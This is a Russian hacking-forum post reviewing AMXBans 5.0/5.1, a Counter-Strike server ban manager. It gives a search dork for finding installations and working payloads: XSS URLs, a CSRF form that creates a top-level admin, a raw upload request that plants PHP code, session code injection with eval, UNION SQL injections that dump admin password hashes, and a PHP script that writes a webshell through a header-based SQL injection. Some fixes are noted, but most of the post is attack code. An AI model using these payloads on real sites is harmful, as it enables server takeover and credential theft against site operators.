Форум АНТИЧАТ - Обзор AMXBans

AMXBans 5.0 by YoMama/LuX & lantz69

Site: http://www.amxbans.net/
Dork: allinurl:ban_list.php amxbans
Папки доступные на запись:
include (скрипт сам создает конфиг, который располагается в этой папке)
smarty/templates_c (скомпиленные шаблоны смарти)
tmp (здесь сохраняются залитые на сервак списки банов)

XSS
/unavailable.php?message=%3Cscript%3Ealert(document .cookie)%3C/script%3E
Необходимо: register_globals = On

PHP код:


		
			
if ($_GET['msg'] == "frontend_disabled") {

    $message = lang("_ERRORAMXBANSDISABLED");

} else if ($_GET['msg'] == "setupfile_exists") {

    $message = lang("_ERRORSETUPPHP");

} else if ($_GET['msg'] == "magicquotes_off") {

    $message = lang("_ERRORMAGICQUOTES");

}

//...

$smarty->assign("message",$message);

Подобные ошибки встречаются и в других скриптах. К примеру, /ban_details.php?ban_info[player_name]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS (активная)
/login.php?uid=%3Cscript%3Ealert(/xss/)%3C/script%3E
/admin/log_search.php
Необходимо: register_globals = On

PHP код:


		
			
if(isset($_POST['uid'])){

    $_POST['uid'] = secure($_POST['uid']);

}

//...

    if (isset($_POST['uid'])) {

     $uid = $_POST['uid'];

    } else if ( isset($_SESSION['uid']) ){

     $uid = $_SESSION['uid'];

    }

//...

$add_log    = mysql_query("INSERT INTO $config->logs VALUES ('', '$now', '".$_SERVER['REMOTE_ADDR']."', 'unknown', 'admin logins', '$uid failed to login')") or die (mysql_error());

Метод устранения:
В начала файла include/functions.lang.php дописать

PHP код:


		
			
function regGlobOff($array) {

    foreach($array as $k => $v) {

        unset($GLOBALS[$k]);

    }

}

error_reporting(0);

regGlobOff($_POST);

regGlobOff($_GET);

regGlobOff($_COOKIE);

Path disclosure
Практически в каждом файле:

PHP код:


		
			
// Start session

session_start();

Вставляем в идентификатор сессии запрещенные символы и получаем

Код:

Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /Library/WebServer/test/amxbans/ban_list.php on line 46



Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /Library/WebServer/test/amxbans/ban_list.php:46) in /Library/WebServer/test/amxbans/ban_list.php on line 46



Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /Library/WebServer/test/amxbans/ban_list.php:46) in /Library/WebServer/test/amxbans/ban_list.php on line 46

Метод устранения:
В каждом скрипте перед session_start поставить оператор подавления ошибок @

CSRF
Добавляет нового веб-админа с максимальными полномочиями. "Демо" сплойт:

Код:

<body onload="document.forms.admins.submit()">

<form name='admins' method='post' action='http://test/amxbans/admin/admins_levels.php'>

        <input type='hidden' name='sektion' value='webadmins'>

        <input type='text' name='username' value="test">

        <input type='text' name='password' value="test">

        <input type='text' name='level' value='1'>

        <input type='hidden' name='action' value="insert">

</form>

Метод устранения:
Добавить следующий код, например в include/accesscontrol.inc.php

PHP код:


		
			
if( $_SERVER['REQUEST_METHOD'] == 'POST')

    if(!preg_match('!^http(s)?://' . preg_quote($_SERVER['HTTP_HOST']) . '!i', $_SERVER['HTTP_REFERER']))

        exit;

Заливка шелла
/admin/import_bans.php
Имя файла для заливки должно заканчиваться на .cfg, и его размер не должен привышать 45000 байт. Загружать шелл надо указав тип файла "text/plain". Шелл зальется в папку tmp с тем же именем.
Пример:

Код:

$nc localhost 80

POST /amxbans/admin/import_bans.php HTTP/1.1

User-Agent: Opera/10.00 (Macintosh; Intel Mac OS X; U; en) Presto/2.2.0

Host: test

Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1

Accept-Language: en,ru;q=0.9,ja;q=0.8,fr;q=0.7,de;q=0.6,es;q=0.5,it;q=0.4,pt;q=0.3,pt-PT;q=0.2,nl;q=0.1,sv;q=0.1,nb;q=0.1,da;q=0.1,fi;q=0.1,pl;q=0.1,zh-CN;q=0.1,zh-TW;q=0.1,ko;q=0.1

Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1

Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0

Referer: http://test/amxbans/admin/import_bans.php

Cookie: amxbans=oRb%3Ad8578edf8458ce06fbc5bb76a58c5ca4%3A1%3A%3A971f14d9f928e6458ccf6e3d3cb13a54%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes; PHPSESSID=29d9830bde44023b1e1c2affc6d82324

Cookie2: $Version=1

Connection: Close

TE: deflate, gzip, chunked, identity, trailers

Content-Length: 566

Content-Type: multipart/form-data; boundary=----------sLuN8T5jVOiPkDnr0wuySS



-------VOiPkDnr0wuySS

Content-Disposition: form-data; name="submitted"



true

------------sLuN8T5jVOiPkDnr0wuySS

Content-Disposition: form-data; name="banlog"; filename="info.php.cfg"

Content-Type: text/plain



<?php phpinfo(); ?>

------------sLuN8T5jVOiPkDnr0wuySS

Content-Disposition: form-data; name="ban_reason"





------------sLuN8T5jVOiPkDnr0wuySS

Content-Disposition: form-data; name="ban_length"





------------sLuN8T5jVOiPkDnr0wuySS

Content-Disposition: form-data; name="importit"



import

------------sLuN8T5jVOiPkDnr0wuySS--

Таблицы:
amx_admins_servers
amx_amxadmins
amx_banhistory
amx_banreasons
amx_bans
amx_levels
amx_logs
amx_serverinfo
amx_webadmins (id, username, password, level, logcode) //password = md5 хеш

Cookies:
Ставится 1 кука с именем amxbans. Ее содержимое: oRb%3Ad8578edf8458ce06fbc5bb76a58c5ca4%3A1%3A%3Ac2 b6a0f098280fc8f4795e33b58a77ed%3Ayes%3Ayes%3Ayes%3 Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ay es%3Ayes%3Ayes

PHP код:


		
			
$cook            = explode(":", $_COOKIE["amxbans"]);

    $uid            = $cook[0];

    $pwd            = $cook[1];

    $lvl            = $cook[2];

    $uip            = $cook[3];

    $logcode        = $cook[4];

    $bans_add        = $cook[5];

    $bans_edit        = $cook[6];

    $bans_delete        = $cook[7];

    $bans_unban        = $cook[8];

    $bans_import        = $cook[9];

    $bans_export        = $cook[10];

    $amxadmins_view        = $cook[11];

    $amxadmins_edit        = $cook[12];

    $webadmins_view        = $cook[13];

    $webadmins_edit        = $cook[14];

    $permissions_edit    = $cook[15];

    $prune_db        = $cook[16];

    $servers_edit        = $cook[17];

    $ip_view        = $cook[18];

В сессию отлично пишется php код. Достаточно просто обратится к скрипту с параметром newlang. /ban_search.php?newlang=%3C?%20eval($_GET[c])?%3E
Получим:

Код:

lang|s:19:"<? eval($_GET[c])?>";uid|s:4:"test";pwd|s:32:"098f6bcd4621d373cade4e832627b4f6";uip|s:0:"";lvl|s:1:"1";userid|N;bans_add|s:3:"yes";bans_edit|s:2:"no";bans_delete|s:2:"no";bans_unban|s:2:"no";bans_import|s:2:"no";bans_export|s:2:"no";amxadmins_view|s:2:"no";amxadmins_edit|s:2:"no";webadmins_view|s:2:"no";webadmins_edit|s:2:"no";permissions_edit|s:2:"no";prune_db|s:2:"no";servers_edit|s:2:"no";ip_view|N;

AMXBans работает только c magic_quotes = On !

Итак проект AMXBans ожил и 15 марта была зарелизена новая версия (5.1). Для тех кто не в курсе: AMXBans - это очень популярная система управления банами и админами на серверах CS 1.6. В новой версии не исправили старых багов, лишь добавили новых.

XSS (register_globals=on)

PHP код:


		
			
$resource    = mysql_query("SELECT access, nickname FROM $config->amxadmins WHERE ashow = '1' ORDER BY access ASC") or die(mysql_error());

while($result = mysql_fetch_object($resource)) {



        $amxadmins_info = array(

            "access"    => $result->access,

            "nickname"    => $result->nickname

            );

    

        $amxadmins_array[] = $amxadmins_info;

    }

...

$smarty->assign("amxadmin",isset($amxadmins_array) ? $amxadmins_array : "");

/admins_list.php?amxadmins_array[999][nickname]=[XSS]

XSS
(так же актуально для предыдущей версии)

PHP код:


		
			
$smarty->assign("this",$_SERVER['PHP_SELF']);

/admin/add_ban.php/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Path disclosure

PHP код:


		
			
session_start();

...

if(mysql_num_rows($resource) == 0) {

        trigger_error("Can't find ban with given ID.", E_USER_NOTICE);

    } else {

/ban_details_ex.php?bhid=-1
или измененное значение сессии.

SQL-injection

PHP код:


		
			
    $bhid = $_GET['bhid'];

    $resourcec    = mysql_query("SELECT id, name, comment, email, addr, date FROM $config->amxcomments WHERE bhid =".mysql_escape_string($bhid)." ORDER BY date ASC") or die(mysql_error());

/ban_details_ex.php?bhid=-1+union+select+1,2,concat_ws(0x3a,username,passwor d,logcode),4,5,6+from+amx_webadmins

SQL-injection (register_globals=on)

PHP код:


		
			
    $where[] = "address != 'localhost:27000'";





$resource = mysql_query("SELECT * FROM $config->servers WHERE ".implode(" AND ",$where)." ORDER BY hostname ASC") or die (mysql_error());

/live.php?where[]=0+union+select+1,2,concat_ws(0x3a,username,passwo rd),4,5,6,7,8,9,10+from+amx_webadmins--+

Blind SQL-injection exploit
Скуль присутствует в ban_details.php и ban_details_ex.php, только ее необходимость многие могли бы поставить под сомнение, тк выше уже была описана инъекция с выводом. Но если File_priv = y, тогда можно залить шелл.
Разработчики добавили возможность комментировать баны, и чтобы банлист не спамили, они прикрутили каптчу. Вот только реализовали они ее хреново:

PHP код:


		
			
$rand = mt_rand(1000000,9999999); 

$rand = base64_encode($rand); 

$rand = substr($rand, 0, 7).""; 

$rand = str_replace("J", "Z", $rand); 

$rand = str_replace("I", "Y", $rand); 

$rand = str_replace("j", "z", $rand); 

$rand = str_replace("i", "y", $rand); 



if(!isset($_POST[action]) && $_POST[action] != "insert"){ 

    unset($_SESSION['code']); 

    $_SESSION['code'] = "$rand"; 

}

...

if($_POST['verify'] != $_SESSION['code']){ 

         $url      = "$config->document_root"; 

         $delay   = "5"; 

         echo "Incorrect security code, please try again!";

         if(isset($_GET["bhid"])) {

            $bhid = $_GET['bhid'];

            echo "<meta http-equiv=\"refresh\" content=\"".$delay.";url=\"ban_details_ex.php?bhid=$bhid\">";

        }

         exit(); 

}

Т.е. если сразу постить, код капчи не сгенерируется и будет равен пустой строке, следовательно каптча - не помеха. Сама уязвимость:

PHP код:


		
			
if ((isset($_POST['action'])) && ($_POST['action'] == "insert")) {



if ($_SERVER['HTTP_CLIENT_IP'])

{

    $user_ip = $_SERVER['HTTP_CLIENT_IP'];

} 

else if ($_SERVER['HTTP_X_FORWARDED_FOR'])

{

    $user_ip = $_SERVER['HTTP_X_FORWARDED_FOR'];

} 

else if ($_SERVER['REMOTE_ADDR'])

{

    $user_ip = $_SERVER['REMOTE_ADDR'];

} 

else

{

    $user_ip = "";

}



...



$name = $_POST['name'];

$comment = $_POST['comment'];

$email = $_POST['email'];

$bhid=$_GET["bhid"];



    $time = time();

        $contact_flood=5*60;



    if(isset($_GET['bhid'])) {

         $bhid = $_GET["bhid"];

        $sql = mysql_query("SELECT date FROM $config->amxcomments WHERE addr = '".$user_ip."' AND bhid = '".$bhid."' ORDER BY date DESC LIMIT 0, 1");

    }

Ну и сам простенький сплойт:

PHP код:


		
			
<?php

$url = 'http://test/amxbans51/';

$text = '<?php eval($_GET[c]);?>';

$path = '/Library/WebServer/test/amxbans51/';

$file = 'demos/shell.php';



$postdata = http_build_query(

    array(

        'action' => 'insert',

        'verify' => ""

    )

);

$opts = array('http' =>

    array(

        'method'  => 'POST',

        'header'  => "Content-type: application/x-www-form-urlencoded\r\n"

                    ."CLIENT-IP: 0' union select '".addslashes($text)."' into outfile '".$path.$file."'#",

        'content' => $postdata

    )

);

$context = stream_context_create($opts);

@file_get_contents($url.'ban_details.php?bhid=-1', false, $context);

echo "Check: ".$url.$file."\n";

?>

ps1: если на сервере стоит AMXBans это железобетонно означает, что на сервере magic_quotes=on
ps2: если не удастся найти пароль по хешу, можно составить куку.
ps3: шелл прекрасно льется через /admin/demo.php